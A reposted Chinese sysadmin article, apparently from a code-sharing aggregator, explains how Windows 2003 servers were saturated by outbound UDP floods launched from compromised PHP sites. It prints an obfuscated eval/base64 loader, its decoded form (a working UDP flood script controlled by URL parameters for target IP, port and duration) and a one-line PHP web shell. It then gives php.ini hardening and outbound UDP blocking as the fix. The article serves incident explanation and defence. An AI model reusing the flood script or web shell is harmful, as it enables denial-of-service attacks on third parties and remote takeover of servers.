脚本宝典收集整理的这篇文章主要介绍了win2003遭受udp攻击导致带宽占用很大,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
后来发现在一个网站里面发现一个加密的.解密后看到很熟悉的 udp 莫非有关系?.果然 也有
朋友遇到这样的情况,看来封禁对外udp是很必要的,
以下为转帖:
关于近期一些
服务器遭受UDP攻击的说明
近来我有一两台服务器显示经常受到udp攻击
导致服务器
带宽占用到100%,用华盾查流量占用也无法查到具体是哪个站被攻击了,起初以为是cc攻击,因为停止了iis带
宽就为0了,其实不然,都是部分用户被入侵导致的
下面我想说一下被入侵的原理
用户程序中的一个php页面的原代码:
<?php
/*
gl
*/
eval(gzinflate(base64_decode('
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhT
f2Xw
6zP4cdvIbfUZlQ1XhQchH
DF3z39Ldpx33Lk9
XM78dUoCHeKfilO46tqg21
dieg+BCTz9QW/GD+lMGtT
hrSmd
SEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5E
CFWjzmfZe2xqERmt
MLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjdu
h1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9
jqhbyq949q
vb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6l
ITZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3
QQI+1qQuCw
xiZH1aaTMK
JITxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXC
PEY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeR
BTgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVs
F1hM63tSpymtn4k1QFEGLVowe93kyhxG
brpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///
PR+Gfd/')));
经过N次解密后的代码:
<?php
$packets = 0;
$ip =
$_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand <br><br>\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$
i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp =
fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet
complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets avera
ging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>
<?php eval($_POST[d
DOS])?>
b
aidu了一下工作原理:
先把你代码放到一个
正常的网页中.
通过url传递IP和端口以udp的方式打开.传递文件到服务器写出.
这样服务器就中招了.
也就是服务器显示udp攻击,带宽占用非常之严重,基本是100%,一般徘徊在97%-99%之间
解决
方案:
在Php.ini中限制php用网络。
在php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,
意思就是限制用sockets.dll
然后重启IIS
我没关这个函数,有的程序需要貌似,直接把udp出站端口给封了.
脚本宝典总结
以上是脚本宝典为你收集整理的win2003遭受udp攻击导致带宽占用很大全部内容,希望文章能够帮你解决win2003遭受udp攻击导致带宽占用很大所遇到的问题。
如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。